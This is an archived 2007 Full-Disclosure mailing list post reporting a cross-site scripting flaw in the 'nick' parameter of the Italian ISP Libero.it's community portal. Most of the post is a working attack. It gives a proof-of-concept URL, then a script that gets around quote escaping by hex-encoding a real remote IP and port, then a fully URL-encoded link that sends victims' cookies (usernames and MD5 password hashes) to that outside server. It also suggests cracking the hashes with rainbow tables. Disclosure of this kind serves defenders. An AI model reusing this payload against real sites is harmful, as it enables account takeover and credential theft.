lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 26 Mar 2007 10:24:33 +0200 From: "Rosario Valotta" <rosario.valotta@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Libero.it (italian ISP) XSS vulnerability Libero.it, one of the most important italian ISP (www.libero.it) is affected from a XSS vulnerability. The vulnerability can be found in the "Community" section of Libero portal, and the affected functionality is "add nick" ( http://digiland.libero.it/profilo.phtml?nick=). The implementation of this functionality allows the injection of malicious code in the URL, so that an attacker can steal username and password of the victim accessing his cookie. The normal URL would be something linke this: http://digiland.libero.it/profilo.phtml?nick=mickey where "mickey" is the name of the nick i'd like to add to mu buddy list. Trough a simple XSS locator can be found that the page is vulnerable to the XSS vector: http://digiland.libero.it/profilo.phtml?nick=%3cIMG%20SRC=javascript:alert(document.cookie )> The cookie showed contains the victim username and password (used for both the Community and the Webmail): the username is stored in plain text while the password is hashed with md5 algorithm (most password are 5-6 char long and can be decrypted using a md5-rainbowtables approach) A more crafted URL makes possible to automatically post victim cookies to a remote server. A simple parsing of the URL is done by the web application, so that quote and double-quote (' and ") chars are escaped by putting a \ before of them (both using ASCII and URL encoding). So it's a bit tricky to pass in the XSS URL the remote server URL and the cookie. This control can be avoided constructing the remote server URL from inside the web application logic - the attacker remote base url is encoded using URL encoding and the % char is removed: (http://82.53.175.227:8080/sample/hello?c= --> 687474703A2F2F38322E35332E3137352E3232373A383038302F73616D706C652F68656C6C6F3F633D) - the following script can be easily attached to the webapp url: <script> c=document.cookie; pcent=/%/.source; str=/687474703A2F2F38322E35332E3137352E3232373A383038302F73616D706C652F68656C6C6F3F633D/.source; temp=str.substring(0,0); for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)}; tot=unescape(temp)+c; document.location.href=tot; </script> (on some browser the "eval()" method must be applied on "tot") - the so composed script is URL encoded and attached to the webapp URL: http://digiland.libero.it/profilo.phtml?nick=%3C%73%63%72%69%70%74%3E%0D%0A%63%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%0D%0A%70%63%65%6E%74%3D%2F%25%2F%2E%73%6F%75%72%63%65%3B%0D%0A%73%74%72%3D%2F%36%38%37%34%37%34%37%30%33%41%32%46%32%46%33%38%33%32%32%45%33%35%33%33%32%45%33%31%33%37%33%35%32%45%33%32%33%32%33%37%33%41%33%38%33%30%33%38%33%30%32%46%37%33%36%31%36%44%37%30%36%43%36%35%32%46%36%38%36%35%36%43%36%43%36%46%33%46%36%33%33%44%2F%2E%73%6F%75%72%63%65%3B%0D%0A%74%65%6D%70%3D%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%30%29%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%74%72%2E%6C%65%6E%67%74%68%3B%69%2B%3D%32%29%7B%74%65%6D%70%2B%3D%70%63%65%6E%74%2B%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%69%2C%69%2B%32%29%7D%3B%0D%0A%74%6F%74%3D%75%6E%65%73%63%61%70%65%28%74%65%6D%70%29%2B%63%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%74%6F%74%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E Greetings, Rosario Valotta _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists